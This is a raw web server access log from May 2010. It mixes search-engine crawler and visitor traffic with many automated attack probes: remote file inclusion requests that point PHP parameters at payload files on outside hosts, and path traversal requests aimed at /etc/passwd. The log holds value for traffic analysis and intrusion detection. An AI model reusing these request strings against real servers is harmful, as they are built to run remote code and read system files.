69.175.97.18 - - [06/May/2010:09:31:52 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 4500 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:31:54 -0500] "GET /logs/access_log.1262390400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:31:54 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:31:54 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 4500 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:32:02 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:32:02 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 4500 "-""Mozilla/5.0"
69.175.97.18 - - [06/May/2010:09:32:02 -0500] "GET /logs/access_log.1270857600//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
38.101.148.126 - - [06/May/2010:09:32:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [06/May/2010:09:32:17 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
207.46.199.38 - - [06/May/2010:09:33:52 -0500] "GET /logs/access_log.1228694400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [06/May/2010:09:33:59 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
134.147.125.103 - - [06/May/2010:09:34:40 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
216.129.119.43 - - [06/May/2010:09:36:33 -0500] "GET /logs/access_log.1272758400 HTTP/1.1" 200 390938 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
38.101.148.126 - - [06/May/2010:09:45:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
216.129.119.40 - - [06/May/2010:09:45:09 -0500] "GET /logs/access_log.1223683200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
38.101.148.126 - - [06/May/2010:09:45:12 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
87.250.255.243 - - [06/May/2010:09:48:09 -0500] "GET /logs/access_log.1208736000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.13 - - [06/May/2010:09:50:39 -0500] "GET /logs/access_log.1216166400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
114.108.151.149 - - [06/May/2010:09:55:07 -0500] "GET /logs/access_log.1270598400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
114.108.151.149 - - [06/May/2010:09:55:07 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
114.108.151.149 - - [06/May/2010:09:55:08 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.46.204.243 - - [06/May/2010:09:56:21 -0500] "GET /logs/access_log.1181433600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.49 - - [06/May/2010:09:56:52 -0500] "GET /logs/access_log.1225065600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:09:57:35 -0500] "GET /logs/access_log.1222905600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.189 - - [06/May/2010:10:01:21 -0500] "GET /logs/access_log.1172966400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.146 - - [06/May/2010:10:02:52 -0500] "GET /logs/access_log.1247702400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.222.129.26 - - [06/May/2010:10:10:05 -0500] "GET /logs//rgboard/include/mail.inc.php?skin_board_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.222.129.26 - - [06/May/2010:10:10:05 -0500] "GET //rgboard/include/mail.inc.php?skin_board_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.222.129.26 - - [06/May/2010:10:10:05 -0500] "GET /logs/access_log.1242432000%20%20//rgboard/include/mail.inc.php?skin_board_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:10:10:07 -0500] "GET /logs/access_log.1193443200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
164.77.228.201 - - [06/May/2010:10:11:18 -0500] "GET /logs//rgboard/include/mail.inc.php?skin_board_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
164.77.228.201 - - [06/May/2010:10:11:18 -0500] "GET /logs/access_log.1265673600//rgboard/include/mail.inc.php?skin_board_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
164.77.228.201 - - [06/May/2010:10:11:18 -0500] "GET //rgboard/include/mail.inc.php?skin_board_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
65.163.88.107 - - [06/May/2010:10:13:14 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
65.163.88.107 - - [06/May/2010:10:13:14 -0500] "GET /logs/access_log.1268956800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.163.88.107 - - [06/May/2010:10:13:17 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
65.163.88.107 - - [06/May/2010:10:13:34 -0500] "GET /logs/access_log.1270598400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.204.194 - - [06/May/2010:10:18:52 -0500] "GET /logs/access_log.1251590400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.11.75.68 - - [06/May/2010:10:19:25 -0500] "GET /logs/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:10:19:25 -0500] "GET /derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:10:19:25 -0500] "GET /logs/access_log.1230422400/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:10:19:27 -0500] "GET /logs/access_log.1230422400/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:10:19:27 -0500] "GET /derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:10:19:33 -0500] "GET /logs/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:10:19:55 -0500] "GET /logs/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:10:19:55 -0500] "GET /derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:10:19:55 -0500] "GET /logs/access_log.1230422400/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:10:20:33 -0500] "GET /logs/access_log.1262217600/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:10:20:44 -0500] "GET /derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:10:20:44 -0500] "GET /logs/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:10:20:44 -0500] "GET /logs/access_log.1262217600/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:10:21:16 -0500] "GET /derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:10:21:17 -0500] "GET /logs/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:10:21:17 -0500] "GET /logs/access_log.1230422400/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.222.129.26 - - [06/May/2010:10:21:20 -0500] "GET /logs/access_log.1266451200//rgboard/include/mail.inc.php?skin_board_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:10:21:55 -0500] "GET /derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:10:21:55 -0500] "GET /logs/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:10:21:55 -0500] "GET /logs/access_log.1262217600/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:10:22:19 -0500] "GET /derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:10:22:19 -0500] "GET /logs/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:10:22:19 -0500] "GET /logs/access_log.1230422400/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:10:24:49 -0500] "GET /logs/access_log.1262217600/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:10:25:42 -0500] "GET /logs/access_log.1262217600/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:10:26:56 -0500] "GET /logs/access_log.1230422400/derniers_commentaires.php?rep=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.163.88.107 - - [06/May/2010:10:27:09 -0500] "GET //skin/ggambo6210_board/setup.php?dir=http://smash4.fileave.com/zfxid1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
65.163.88.107 - - [06/May/2010:10:27:10 -0500] "GET /logs//skin/ggambo6210_board/setup.php?dir=http://smash4.fileave.com/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.163.88.107 - - [06/May/2010:10:27:10 -0500] "GET /logs/access_log.1262736000//skin/ggambo6210_board/setup.php?dir=http://smash4.fileave.com/zfxid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:10:28:56 -0500] "GET /logs/access_log.1254873600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
115.68.20.197 - - [06/May/2010:10:31:30 -0500] "GET /logs/db.php?path_local=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
115.68.20.197 - - [06/May/2010:10:31:30 -0500] "GET /logs/access_log.1268956800/db.php?path_local=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
115.68.20.197 - - [06/May/2010:10:31:30 -0500] "GET /db.php?path_local=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
115.68.20.197 - - [06/May/2010:10:31:38 -0500] "GET /logs/access_log.1270598400/db.php?path_local=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
66.249.71.205 - - [06/May/2010:10:32:35 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
115.68.20.197 - - [06/May/2010:10:36:52 -0500] "GET /logs/access_log.1270857600/index.php?openfile=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
115.68.20.197 - - [06/May/2010:10:36:53 -0500] "GET /index.php?openfile=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.13.46 - - [06/May/2010:10:36:53 -0500] "GET /logs/access_log.1227312000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
115.68.20.197 - - [06/May/2010:10:36:53 -0500] "GET /logs/index.php?openfile=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
99.39.2.249 - - [06/May/2010:10:37:10 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:10 -0500] "GET /logs/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:10 -0500] "GET /?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:23 -0500] "GET /?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:24 -0500] "GET /?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:24 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:24 -0500] "GET /logs/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:28 -0500] "GET /logs/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:28 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:28 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:34 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
115.68.20.197 - - [06/May/2010:10:37:43 -0500] "GET /logs/access_log.1227484800/index.php?openfile=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
99.39.2.249 - - [06/May/2010:10:37:46 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:46 -0500] "GET /logs/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:47 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:47 -0500] "GET /?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:49 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:49 -0500] "GET /?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:37:50 -0500] "GET /logs/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
115.68.20.197 - - [06/May/2010:10:38:02 -0500] "GET /logs/access_log.1270857600%20/index.php?openfile=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
99.39.2.249 - - [06/May/2010:10:39:42 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
99.39.2.249 - - [06/May/2010:10:40:32 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
91.76.97.60 - - [06/May/2010:10:42:32 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
87.250.255.243 - - [06/May/2010:10:42:54 -0500] "GET /logs/access_log.1228003200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [06/May/2010:10:44:27 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [06/May/2010:10:44:27 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [06/May/2010:10:44:27 -0500] "GET /logs/access_log.1268956800/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.88.4.141 - - [06/May/2010:10:44:35 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [06/May/2010:10:44:35 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [06/May/2010:10:44:36 -0500] "GET /logs/access_log.1268956800/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.88.4.141 - - [06/May/2010:10:45:55 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [06/May/2010:10:45:55 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [06/May/2010:10:45:55 -0500] "GET /logs/access_log.1268956800%20%20/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.88.4.141 - - [06/May/2010:10:45:56 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [06/May/2010:10:45:56 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [06/May/2010:10:45:56 -0500] "GET /logs/access_log.1268956800%20%20/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.96.90.170 - - [06/May/2010:10:48:08 -0500] "GET /arif? HTTP/1.1" 404 288 "-""libwww-perl/5.805"
87.250.255.243 - - [06/May/2010:10:50:21 -0500] "GET /logs/access_log.1174348800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
218.38.34.19 - - [06/May/2010:10:55:49 -0500] "GET /write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:10:55:49 -0500] "GET /logs/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:10:55:49 -0500] "GET /logs/access_log.1265760000/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.220.51.208 - - [06/May/2010:10:56:37 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:37 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:38 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:40 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:40 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:41 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:41 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:41 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:41 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:41 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:41 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
72.220.51.208 - - [06/May/2010:10:56:41 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
